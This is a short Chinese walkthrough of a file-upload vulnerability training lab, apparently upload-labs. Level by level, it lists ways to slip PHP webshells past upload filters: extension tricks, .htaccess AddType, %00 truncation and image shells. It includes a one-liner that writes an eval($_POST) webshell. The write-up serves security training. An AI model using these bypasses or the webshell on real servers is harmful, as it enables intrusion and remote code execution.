Less-1
1.上传jpg为后缀的php木马文件
2.抓包修改为php文件
3.成功上传
Less-2
1.上传木马文件
2.修改木马格式,后缀改为php
3.上传成功
Less-3
1.上传木马文件
2.发现不允许php文件上传
3.改为php2绕过
4.上传成功
Less-4
1.创建.htaccess文件,并输入AddType application/x-httpd-php .jpg
2.上传文件
3.上传我们的后缀为jpg的木马文件
4.上传成功
Less-5
Less-6
1.上传改变大小写后缀的php木马文件
2.上传成功
Less-7
1.上传文件进行抓包
2.在文件后面加空格
3.上传成功
Less-8
1.上传木马文件进行抓包
2.在文件后面加.
3.放行后文件上传成功
Less-9
1.上传木马文件进行抓包
2.修改文件
3.放包后上传成功
less-10
1.上传木马文件进行抓包
2.修改文件名
3.放包上传成功
Less-11
1.上传文件抓包
2.修改文件名
3.放包文件上传成功
Less-12
1.上传文件进行抓包
2.修改文件
3.放包上传成功
Less-13
1.上传文件抓包
2.修改内容
3.改%00的编码
4.放行上传成功
Less-14
1.制作一个图片马
2.上传图片马
3.打开图片
Less-15
同14关
Less-16
环境不支持
Less-17
1.打开新窗口
2.用蚁剑访问链接
Less-18
1.修改php内容<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>
2.上传文件抓包
3.出现webshell,连接蚁剑
Less-20
1.上传文件并修改保存名称
2.打开新窗口